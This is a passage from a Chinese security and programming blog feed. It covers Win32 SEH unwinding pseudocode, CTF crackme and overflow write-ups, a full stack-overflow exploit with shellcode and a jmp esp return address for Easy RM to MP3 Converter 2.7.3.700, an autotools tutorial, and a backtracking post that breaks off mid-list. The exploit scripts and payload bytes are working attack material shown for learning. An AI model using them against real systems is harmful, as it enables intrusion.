<p>为了说明这个概念,需要先回顾下异常发生后的处理流程。</p>
<p>我们假设一系列使用 SEH 的函数调用流程:
func1 -> func2 -> func3。在 func3 执行的过程中触发了异常。</p>
<p>看看分发异常流程 RtlRaiseException -> RtlDispatchException -> RtlpExecuteHandlerForException
RtlDispatchException 会遍历异常链表,对每个 EXCEPTION_REGISTRATION 都调用 RtlpExecuteHandlerForException。
RtlpExecuteHandlerForException 会调用 EXCEPTION_REGISTRATION::handler,也就是 ——__except_handler3。如咱们上面分析,该函数内部遍历 EXCEPTION_REGISTRATION::scopetable,如果遇到有 scopetable_entry::lpfnFilter 返回 EXCEPTION_EXECUTE_HANDLER,那么 scopetable_entry::lpfnHandler 就会被调用,来处理该异常。
因为 lpfnHandler 不会返回到__except_handler3,于是执行完 lpfnHandler 后,就会从 lpfnHandler 之后的代码继续执行下去。也就是说,假设 func3 中触发了一个异常,该异常被 func1 中的 __except 处理块处理了,那 __except 处理块执行完毕后,就从其后的指令继续执行下去,即异常处理完毕后,接着执行的就是 func1 的代码。不会再回到 func2 或者 func3,这样就有个问题,func2 和 func3 中占用的资源怎么办?这些资源比如申请的内存是不会自动释放的,岂不是会有资源泄漏问题?</p>
<p>这就需要用到“展开”了。
说白了,所谓“展开”就是进行清理。(注:这里的清理主要包含动态分配的资源的清理,栈空间是由 func1 的“mov esp,ebp” 这类操作顺手清理的。当时我被“谁来清理栈空间”这个问题困扰了很久……)</p>
<p>那这个展开工作由谁来完成呢?由 func1 来完成肯定不合适,毕竟 func2 和 func3 有没有申请资源、申请了哪些资源,func1 无从得知。于是这个展开工作还得要交给 func2 和 func3 自己来完成。</p>
<p>展开分为两种:“全局展开”和“局部展开”。
全局展开是指针对异常链表中的某一段,局部展开针对指定 EXCEPTION_REGISTRATION。用上面的例子来讲,局部展开就是针对 func3 或 func2 (某一个函数)内部进行清理,全局展开就是 func2 和 func3 的局部清理的总和。再归纳一下,局部展开是指具体某一函数内部的清理,而全局展开是指,从异常触发点(func3)到异常处理点(func1)之间所有函数(包含异常触发点 func3)的局部清理的总和。</p>
<p>使用RtlUnwind来进行展开。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void _RtlUnwind( PEXCEPTION_REGISTRATION pRegistrationFrame,
PVOID returnAddr, // 并未使用!(至少是在i386机器上)
PEXCEPTION_RECORD pExcptRec,
DWORD _eax_value)
{
DWORD stackUserBase;
DWORD stackUserTop;
PEXCEPTION_RECORD pExcptRec;
EXCEPTION_RECORD exceptRec;
CONTEXT context;
// 从FS:[4]和FS:[8]处获取堆栈的界限
RtlpGetStackLimits( &stackUserBase, &stackUserTop );
if ( 0 == pExcptRec ) // 正常情况
{
pExcptRec = &excptRec;
pExcptRec->ExceptionFlags = 0;
pExcptRec->ExceptionCode = STATUS_UNWIND;
pExcptRec->ExceptionRecord = 0;
pExcptRec->ExceptionAddress = [ebp+4]; // RtlpGetReturnAddress()—获取返回地址
pExcptRec->ExceptionInformation[0] = 0;
}
if ( pRegistrationFrame )
pExcptRec->ExceptionFlags |= EXCEPTION_UNWINDING;
else // 这两个标志合起来被定义为EXCEPTION_UNWIND_CONTEXT
pExcptRec->ExceptionFlags|=(EXCEPTION_UNWINDING|EXCEPTION_EXIT_UNWIND);
context.ContextFlags =( CONTEXT_i486 | CONTEXT_CONTROL |
CONTEXT_INTEGER | CONTEXT_SEGMENTS);
RtlpCaptureContext( &context );
context.Esp += 0x10;
context.Eax = _eax_value;
PEXCEPTION_REGISTRATION pExcptRegHead;
pExcptRegHead = RtlpGetRegistrationHead(); // 返回FS:[0]的值
// 开始遍历EXCEPTION_REGISTRATION结构链表
while ( -1 != pExcptRegHead )
{
EXCEPTION_RECORD excptRec2;
if ( pExcptRegHead == pRegistrationFrame )
{
NtContinue( &context, 0 );
}
else
{
// 如果存在某个异常帧在堆栈上的位置比异常链表的头部还低
// 说明一定出现了错误
if ( pRegistrationFrame && (pRegistrationFrame <= pExcptRegHead) )
{
// 生成一个异常
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_INVALID_UNWIND_TARGET;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &exceptRec2 );
}
}
PVOID pStack = pExcptRegHead + 8; // 8 = sizeof(EXCEPTION_REGISTRATION)
// 确保pExcptRegHead在堆栈范围内,并且是4的倍数
if ( (stackUserBase <= pExcptRegHead )
&& (stackUserTop >= pStack )
&& (0 == (pExcptRegHead & 3)) )
{
DWORD pNewRegistHead;
DWORD retValue;
retValue = RtlpExecutehandlerForUnwind(pExcptRec, pExcptRegHead, &context,
&pNewRegistHead, pExceptRegHead->handler );
if ( retValue != DISPOSITION_CONTINUE_SEARCH )
{
if ( retValue != DISPOSITION_COLLIDED_UNWIND )
{
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_INVALID_DISPOSITION;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
else
pExcptRegHead = pNewRegistHead;
}
PEXCEPTION_REGISTRATION pCurrExcptReg = pExcptRegHead;
pExcptRegHead = pExcptRegHead->prev;
RtlpUnlinkHandler( pCurrExcptReg );
}
else // 堆栈已经被破坏!生成一个异常
{
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_BAD_STACK;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
}
// 如果执行到这里,说明已经到了EXCEPTION_REGISTRATION
// 结构链表的末尾,正常情况下不应该发生这种情况。
//(因为正常情况下异常应该被处理,这样就不会到链表末尾)
if ( -1 == pRegistrationFrame )
NtContinue( &context, 0 );
else
NtRaiseException( pExcptRec, &context, 0 );
}
RtlUnwind函数的伪代码到这里就结束了,以下是它调用的几个函数的伪代码:
PEXCEPTION_REGISTRATION RtlpGetRegistrationHead( void )
{
return FS:[0];
}
RtlpUnlinkHandler( PEXCEPTION_REGISTRATION pRegistrationFrame )
{
FS:[0] = pRegistrationFrame->prev;
}
void RtlpCaptureContext( CONTEXT * pContext )
{
pContext->Eax = 0;
pContext->Ecx = 0;
pContext->Edx = 0;
pContext->Ebx = 0;
pContext->Esi = 0;
pContext->Edi = 0;
pContext->SegCs = CS;
pContext->SegDs = DS;
pContext->SegEs = ES;
pContext->SegFs = FS;
pContext->SegGs = GS;
pContext->SegSs = SS;
pContext->EFlags = flags; // 它对应的汇编代码为__asm{ PUSHFD / pop [xxxxxxxx] }
pContext->Eip = 此函数的调用者的调用者的返回地址 // 读者看一下这个函数的
pContext->Ebp = 此函数的调用者的调用者的EBP // 汇编代码就会清楚这一点
pContext->Esp = pContext->Ebp + 8;
}
</code></pre></div></div>
<p>虽然 RtlUnwind 函数的规模看起来很大,但是如果你按一定方法把它分开,其实并不难理解。它首先从FS:[4]和FS:[8]处获取当前线程堆栈的界限。它们对于后面要进行的合法性检查非常重要,以确保所有将要被展开的异常帧都在堆栈范围内。</p>
<p>RtlUnwind 接着在堆栈上创建了一个空的EXCEPTION_RECORD结构并把STATUS_UNWIND赋给它的ExceptionCode域,同时把 EXCEPTION_UNWINDING标志赋给它的 ExceptionFlags 域。指向这个结构的指针作为其中一个参数被传递给每个异常回调函数。然后,这个函数调用RtlCaptureContext函数来创建一个空的CONTEXT结构,这个结构也变成了在展开阶段调用每个异常回调函数时传递给它们的一个参数。</p>
<p>RtlUnwind函数的其余部分遍历EXCEPTION_REGISTRATION结构链表。对于其中的每个帧,它都调用 RtlpExecuteHandlerForUnwind 函数,正是这个函数带 EXCEPTION_UNWINDING 标志调用了异常处理回调函数。RtlpExecuteHandlerForException的代码与RtlpExecuteHandlerForUnwind的代码极其相似。这两个“函数”都只是简单地给EDX寄存器加载一个不同的值然后就调用ExecuteHandler函数。也就是说,RtlpExecuteHandlerForException和RtlpExecuteHandlerForUnwind都是 ExecuteHanlder这个公共函数的前端。</p>
<p>ExecuteHandler查找EXCEPTION_REGISTRATION结构的handler域的值并调用它。令人奇怪的是,对异常处理回调函数的调用本身也被一个结构化异常处理程序封装着。在SEH自身中使用SEH看起来有点奇怪,但你思索一会儿就会理解其中的含义。如果在异常回调过程中引发了另外一个异常,操作系统需要知道这个情况。根据异常发生在最初的回调阶段还是展开回调阶段,ExecuteHandler或者返回DISPOSITION_NESTED_EXCEPTION,或者返回DISPOSITION_COLLIDED_UNWIND。这两者都是“红色警报!现在把一切都关掉!”类型的代码。
每次回调之后,它调用RtlpUnlinkHandler 移除相应的异常帧。</p>
<p>RtlUnwind 函数的第一个参数是一个帧的地址,当它遍历到这个帧时就停止展开异常帧。上面所说的这些代码之间还有一些安全性检查代码,它们用来确保不出问题。如果出现任何问题,RtlUnwind 就引发一个异常,指示出了什么问题,并且这个异常带有EXCEPTION_NONCONTINUABLE 标志。当一个进程被设置了这个标志时,它就不允许再运行,必须终止。</p>
<p>参考:</p>
<ol>
<li>
<p>A Crash Course on the Depths of Win32™ Structured Exception Handling</p>
</li>
<li>
<p>SEH分析笔记(X86篇)</p>
</li>
<li>
<p>《软件调试》张银奎</p>
</li>
<li>
<p>ReactOS源码</p>
</li>
<li>
<p>wrk源码</p>
</li>
</ol>
XDCSC2010破解题22014-03-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/25/xdcsc-04pojie
<p>程序下载<a href="/assets/file/xdcsc2010/04pojie.zip">04破解</a>
丢到IDA里面一看,当场吓尿了,这么蛋疼的算过去算过来要分析到什么时候去。这个程序的流程就非常清楚的,就是输入一个参数,经过各种运算,最终得到的结果与</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1011010011110110
</code></pre></div></div>
<p>相比,如果相同就Yes,否则Sorry。既然题目的readme说密码为三位数字,我直接将000——999枚举一遍就ok了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
#f = open('ret.txt','w')
for i in range(10):
for j in range(10):
for k in range(10):
param = str(i)+str(j)+str(k)
ret = os.popen('1.exe ' + param)
#f.write(param + ":" + ret.read())
if(ret.read() == "Yes\n"):
print 'The answer is :' + param
#f.close()
</code></pre></div></div>
<p>下面是python中的结果:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>>
The answer is :918
>>>
</code></pre></div></div>
<p>再次运行原程序:</p>
<p><img src="/assets/img/xdcsc2010/04pojie/1.PNG" alt="" /></p>
XDCSC2010破解题12014-03-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/17/xdcsc-03pojie
<p>这是一个破解题,程序下载<a href="/assets/file/xdcsc2010/03pojie.zip">03破解</a>
程序是要求输入正确的密码,感觉这种题应该不算太难。直接甩到IDA里面,F5(不要鄙视我老师F5,F5看大概,之后OD看细节),一看不打紧,结果发现流程清清楚楚,顿时喜上眉梢。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl wmain()
{
const char *v1; // [sp-4h] [bp-20Ch]@2
char v2; // [sp+4h] [bp-204h]@1
char Dst; // [sp+5h] [bp-203h]@1
unsigned int v4; // [sp+204h] [bp-4h]@1
int v5; // [sp+208h] [bp+0h]@1
v4 = (unsigned int)&v5 ^ __security_cookie;
printf(&Format);
v2 = 0;
memset(&Dst, 0, 0x1FFu);
scanf(&byte_402108, &v2);
if ( strcmp(&v2, (const char *)&unk_40210C) )
v1 = &byte_402130;
else
v1 = (const char *)&unk_402114;
printf(v1);
return 0;
}
</code></pre></div></div>
<p>这就是直接将输入字符串对比就行了啊。然后一看40210C的字符窜,傻了眼有个0x1F,这在键盘上是没有对应的啊,肿么输入啊。这个时候我想到了以前一个同学问的同样的在cmd里面输入键盘上没有对应字符的问题。当时隐约记得可以通过管道,但是解这个题的时候没有想到。后来问了下吴哥,他一说重定向我马上就明白了。靠,这都忘了。</p>
<p>我们看到对应的密码是如图:</p>
<p><img src="/assets/img/xdcsc2010/03pojie/1.PNG" alt="" /></p>
<p>然后我就老老实实构造了一个二进制文件data,内容如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1F 65 63 6D 32 30 34 00
</code></pre></div></div>
<p>cmd执行</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>软件破解1.exe < data
</code></pre></div></div>
<p>结果显示密码错误。这里面其实设计到scanf函数的一个特点。我们一般用scanf的时候都是</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scanf("%s",a)
scanf("%d",&d)
</code></pre></div></div>
<p>这种格式,其实scanf还有这种格式scanf(“This is test%s”,a),这个时候我们输入的时候就必须要输入前面的非格式控制字符”This is test”然后才能输入%s对应的字符串,并且a缓冲区只存放%s部分。这个程序里面是将密码与缓冲区一一比较。我们的data中1F作为对应的非控制字符,为了跟密码一样,我们还得输入一个1f,也就是data的内容应该是:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1F 1F 65 63 6D 32 30 34 00
</code></pre></div></div>
<p>换成这个data,再执行</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>软件破解1.exe < data
</code></pre></div></div>
<p>就成功了。</p>
<p><img src="/assets/img/xdcsc2010/03pojie/2.PNG" alt="" /></p>
一道XDCSC2010溢出题2014-03-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/17/xdcsc-01yichu
<p>昨天偶然上了一下xdsec.org,发现上面放了往年的比赛题目,抱着试一试的心态下了xdcsc2010的题目来看看,这是第一个题的笔记。</p>
<p>这是一个溢出题,程序下载<a href="/assets/file/xdcsc2010/01yichu.zip">ExploitMe</a>,题目要求如下:</p>
<p><img src="/assets/img/xdcsc2010/01yichu/1.png" alt="" /></p>
<p>抄起IDA,找到关键函数,F5一把,下面是大概的流程</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>signed int __cdecl sub_401000()
{
HANDLE v0; // eax@1
void *v1; // edi@1
void *v2; // ebp@1
HANDLE v3; // eax@1
void *v4; // esi@1
unsigned int v5; // ebx@2
HMODULE v6; // esi@3
signed int v8; // [sp+10h] [bp-318h]@1
void *hHeap; // [sp+14h] [bp-314h]@1
HANDLE v10; // [sp+18h] [bp-310h]@1
DWORD NumberOfBytesRead; // [sp+1Ch] [bp-30Ch]@1
int (**v12)(); // [sp+20h] [bp-308h]@1
char v13; // [sp+24h] [bp-304h]@4
int v14; // [sp+A4h] [bp-284h]@1
char v15; // [sp+A8h] [bp-280h]@6
char Buffer; // [sp+128h] [bp-200h]@3
v8 = 0;
v12 = &off_4050B4;
v14 = (int)off_4050B0;
NumberOfBytesRead = 0;
v0 = HeapCreate(0, 0x1000u, 0x10000u);
v1 = v0;
hHeap = v0;
v2 = HeapAlloc(v0, 0, 0x200u);
v3 = CreateFileA("exploit.dat", 0x80000000u, 1u, 0, 4u, 0x80u, 0);
v4 = v3;
v10 = v3;
if ( v3 != (HANDLE)-1 )
{
v5 = GetFileSize(v3, 0);
if ( v5 <= 0x200 )
{
ReadFile(v4, &Buffer, v5, &NumberOfBytesRead, 0);
memcpy(v2, &Buffer, v5);
memset(&Buffer, 0, 0x200u);
v6 = LoadLibraryA("user32.dll");
dword_408510 = (int)GetProcAddress(v6, "MessageBoxW");
dword_408514 = (int)GetProcAddress(v6, "MessageBoxA");
if ( v5 <= 0x84 )
memcpy(&v13, v2, v5);
HeapFree(hHeap, 1u, v2);
memset(v2, 0, 0x80u);
if ( v5 <= 0x84 )
memcpy(&v15, v2, v5);
((void (__thiscall *)(int (***)()))*v12)(&v12);
(*(void (__thiscall **)(int *))v14)(&v14);
v1 = hHeap;
v4 = v10;
v8 = 1;
}
}
if ( v4 )
CloseHandle(v4);
if ( v2 )
HeapFree(v1, 1u, v2);
if ( v1 )
HeapDestroy(v1);
return v8;
}
</code></pre></div></div>
<p>程序流程还是比较明了的,先读取exploit.dat里面的数据到stack上面,接着拷到heap,再倒腾回stack,真实蛋疼,之前就受这个影响考虑多了,以为要涉及堆溢出等。主要是要注意到函数末尾的两个call,v12和v14,经过调试可以发现v14里面的数据是我们可以控制的。这里我就犯了一个错误,导致浪费了大量时间。我当时注意到函数中已经得到了MessageBoxA的地址(dword_408514),我就想直接跳过去,但是由于esp在低地址,参数老是构造不好,因为esp那块数据没有办法覆盖。</p>
<p>今天上午才突然开了窍,既然eip都控制了,还有啥干不了的,直接将eip定位到stack上我们能够覆盖到的数据,然后写几句压栈的shellcode,之后跳转到MessageBoxA里面去。最终的exploit.dat如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000h: 7C FC 12 00 51 6A 00 68 C8 FC 12 00 68 D8 FC 12 ; |?.Qj.h赛..h攸.
00000010h: 00 6A 00 B9 14 85 40 00 FF 11 59 C3 00 00 00 00 ; .j.?匑..Y?...
00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000050h: 45 78 70 6C 6F 69 74 4D 65 00 00 00 00 00 00 00 ; ExploitMe.......
00000060h: 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73 00 ; Exploit success.
00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000080h: 78 FC 12 00 ; x?.
</code></pre></div></div>
<p>溢出结果</p>
<p><img src="/assets/img/xdcsc2010/01yichu/2.PNG" alt="" /></p>
exploit编写笔记1——基于栈的溢出2014-03-16T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/16/exploit-buffer-overflow
<p>很早以前对漏洞利用这一块就有所了解,当时觉得这些都是一些小tricky,玩的都是一些故意的玩具漏洞,这段时间准备重新拾起来,开始按照教材corelan上面的教材一个一个对着实际的漏洞写exploit。这是第一篇,古老的buffer overflow。因为之前都是OD or windbg,现在要练习一下Immunity Debugger。所以这篇都是用的Immunity。</p>
<p><strong>目标软件</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Easy RM to MP3 Converter(版本2.7.3.700)
</code></pre></div></div>
<p><strong>工具</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Immunity Debugger
</code></pre></div></div>
<p><strong>漏洞描述</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>通过创建一个恶意的.m3u文件将触发Easy RM to MP3 Converter (version 2.7.3.700)缓冲区溢出利用。
</code></pre></div></div>
<p><strong>测试平台</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Microsoft Windows XP Professional 5.1.2600 Service Pack 3 Build 2600
</code></pre></div></div>
<p>下面是详细的exploit步骤</p>
<h3>1. 漏洞触发</h3>
<p>我们首先构造一个30000个字符的.m3u文件,前面25000全为’A’,后5000个为’B’。下面是构造的脚本</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 25000 + 'B' * 5000
f.write(data)
f.close()
</code></pre></div></div>
<p>使用Easy RM to MP3 Converter加载这个crash.m3u文件,可以看到发生错误,查看详细信息,如图。</p>
<p><img src="/assets/img/exploit1/1.PNG" alt="" /></p>
<p>从图可以看到,溢出之后的返回地址是0x42424242,也就是’BBBB’,这说明要覆盖的EIP在25000到30000之间。下面使用Immunity的查件mona来进行精确定位。</p>
<h3>2. EIP定位</h3>
<p>使用Immunity Debugger加载Easy RM to MP3 Converter,Run起来,加载crash.m3u。遇到异常之后Immunity接手。</p>
<p>首先设置mona的工作目录:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona config -set workingfolder c:\mona\%p
</code></pre></div></div>
<p>创建包含5000个字符的pattern:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona pattern_create 5000
</code></pre></div></div>
<p><img src="/assets/img/exploit1/2.PNG" alt="" /></p>
<p>此时pattern文件在C:\mona\RM2MP3Converter\pattern.txt,将pattern中的5000个字符替换crash.m3u中最后5000个字符。脚本如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash_pattern.m3u"
f = open(filename,'w')
data = 'A' * 25000
fp = open("pattern.txt",'r')
data += fp.read()
f.write(data)
f.close()
</code></pre></div></div>
<p>pattern.txt是删除了mona生成的一些信息之后的纯5000个字符文件。再次打开目标软件加载crash_pattern.m3u,看到崩溃之后的EIP如下图所示:</p>
<p><img src="/assets/img/exploit1/3.PNG" alt="" /></p>
<p>在command中输入</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona pattern_offset 366a4235
</code></pre></div></div>
<p><img src="/assets/img/exploit1/4.PNG" alt="" /></p>
<p>我们看到EIP被修改的位置是25000 + 1067。</p>
<p>此时我们再用如下脚本测试一下位置是否正确:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 26067 + 'B' * 4 + 'C'*100
f.write(data)
f.close()
</code></pre></div></div>
<p><img src="/assets/img/exploit1/5.PNG" alt="" /></p>
<p>我们可以看到,EIP现在是4个B,偏移正确,下面就是如何修改这个EIP</p>
<h3>3. 寻找shellcode存放的地址空间</h3>
<p>再次使用上面.m3u文件,崩溃时,打开栈的窗口</p>
<p><img src="/assets/img/exploit1/6.PNG" alt="" /></p>
<p>我们看到在ESP此时为000FF730,EIP到这里还有3*4=12个字节。ESP开始用于存放shellcode。</p>
<h3>4. 查找jmp esp地址</h3>
<p>再次加载目标程序,Run之后Pause,在CPU窗口,右键 Search For ->All commands in All modules,在之后的窗口输入jmp esp。</p>
<p><img src="/assets/img/exploit1/7.PNG" alt="" /></p>
<p>我们选一个7C874413。</p>
<h3>5. 构造最终的输入文件</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0");
ret = "\x13\x44\x87\x7c";
filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 26067 + ret + '\x90' * 12 + shellcode
f.write(data)
f.close()
</code></pre></div></div>
<p><img src="/assets/img/exploit1/8.PNG" alt="" /></p>
<p>我们看到,成功利用了这个漏洞。</p>
autotool工具简介2014-01-15T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/15/autotool
<p>开源软件的安装一般都分三步,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./configure
make
make install
</code></pre></div></div>
<p>本文以一个例子来简单说明一下如何使用autotool工具来简化程序的编译安装。
执行./configure时,检查编译该程序所需要的条件是否存在,并且将(*.in)文件转化为最终文件(Makefile,config.h…)。当./configure成功后,就生成Makefile了。执行make之后,程序进行编译,之后使用make install进行安装。关于autotool的理论就不赘述了,网上随处都能找到,我只是简单记录一下过程。整个软件的发布如图所示:</p>
<p><img src="/assets/img/autotool/1.PNG" alt="" /></p>
<p>我们来创建一个最简单的helloworld工程,目录结构如下。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> helloworld
|
|--include
| --hello.hxx world.hxx
|
|--lib
| |--hello.cxx world.cxx
| --Makefile.am
|
|--src
| |--main.cxx
| --Makefile.am
|
|--Makefile.am
|--README, NEWS, ChangeLog, AUTHORS
</code></pre></div></div>
<ol>
<li>
<p>我们先创建如上所示的目录结构,使用脚本如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mkdir helloworld
cd helloworld
mkdir include
cd include
touch hello.hxx world.hxx
cd ..
mkdir lib
cd lib
touch hello.cxx world.cxx Makefile.am
cd ..
mkdir src
cd src
touch main.cxx Makefile.am
cd ..
touch NEWS README ChangeLog AUTHORS Makefile.am
</code></pre></div> </div>
</li>
<li>
<p>各个文件如下内容:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //main.cxx
#include "hello.hxx"
#include "world.hxx"
#include "config.h" // make configure results available
int main()
{
hello first_word;
world second_word;
std::cout<<PACKAGE_STRING; /* use the preprocessor definitions
from config.h */
first_word.print();
second_word.print();
return 0;
}
//hello.hxx
#include <iostream>
#ifndef HELLO_HXX
#define HELLO_HXX
class hello{
public:
void print();
};
#endif
//hello.cxx
#include "hello.hxx"
void hello::print()
{
std::cout<<" Hello ";
}
</code></pre></div> </div>
</li>
</ol>
<p>world的内容跟hello一样,将hello.hxx和hello.cxx中的“hello”换成“world”即可。</p>
<ol>
<li>
<p>执行autoscan生成一个configure.scan,这是一个模板,我们将其名字改为configure.ac。修改成一下内容:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # -*- Autoconf -*-
# Process this file with autoconf to produce a configure script.
AC_PREREQ([2.68])
AC_INIT(helloworld, 0.01, liq3ea@163.com)
AM_INIT_AUTOMAKE
AC_CONFIG_SRCDIR([include/hello.hxx])
AC_CONFIG_HEADERS([config.h])
# Checks for programs.
AC_PROG_CXX
AC_PROG_RANLIB
# Checks for libraries.
# Checks for header files.
# Checks for typedefs, structures, and compiler characteristics.
# Checks for library functions.
AC_CONFIG_FILES([Makefile
lib/Makefile
src/Makefile])
AC_OUTPUT
</code></pre></div> </div>
</li>
<li>
<p>填写各个目录的Makefile.am:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> helloworld/Makefile.am:
SUBDIRS=lib src
helloworld/lib/Makefile.am:
noinst_LIBRARIES=libhw.a ## static library which is not to be installed
libhw_a_SOURCES=hello.cxx hello.hxx world.cxx world.hxx
libhw_a_CXXFLAGS=-I../include ## add path to headerfiles
helloworld/src/Makefile.am:
bin_PROGRAMS=helloworld
helloworld_SOURCES=main.cxx
helloworld_CXXFLAGS= -I../include ## add path to headerfiles
helloworld_LDADD=../lib/libhw.a ## link with static library
</code></pre></div> </div>
</li>
<li>
<p>接下来执行aclocal autoconf autoheader 命令,然后执行 automake -a 。至此所有该有的文件都有了。</p>
</li>
<li>
<p>执行./configure可以看到检测条件过程,执行make编程程序,sudo make install 安装。</p>
</li>
</ol>
回溯算法及其例子2014-01-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/12/backtrack
<ul>
<li><a href="#第一节">源起</a></li>
<li><a href="#第二节">回溯简介</a></li>
<li><a href="#第三节">所有可能出栈顺序</a></li>
<li><a href="#第四节">八皇后问题</a></li>
</ul>
<h3 id="第一节">源起</h3>
<p>最近在看<a href="http://book.douban.com/subject/10432347/">《算法》</a>,其中有一个题是很老的问题,0~9入栈顺序一定,问哪些出栈顺序是不可能的。如0,1,2,…,7,8,9肯定是可以的,9,8,7,…3,2,1也可以,8,2,3,…就不可以。
这个问题本身是比较简单的,这个问题引出的问题就是求出所有可能的出栈顺序,主要是借此机会复习一下回溯法。</p>
<p>先来就题论题。解题的关键还是模拟出入栈,比如要判断的例子是4,3,2,1,0,9,8,7,6,5。我们先看到第一个出的是4,必然0,1,2,3已经依次压栈了。</p>
<ol>
<li>
<p>我们首先建立一个空栈s,,还有一个输入序列的index,这表示出栈的值,以及即将入栈的元素in,index和in的初始值显然是0,input表示输入的序列;</p>
</li>
<li>
<p>当in不等于input[index]时,我们将in入栈,in再加1,直到其等于input[index];</p>
</li>
<li>
<p>in++,index++;这表示4已经顺利出栈;</p>
</li>
<li>
<p>然后比较s.peek()跟input[index]的值,如果不同,继续循环入栈,相同则出栈;</p>
</li>
</ol>
<p>对照例子我们人肉走一遍程序:</p>
<ol>
<li>
<p>in=0,input[0]=4,将0,1,2,3入栈s;</p>
</li>
<li>
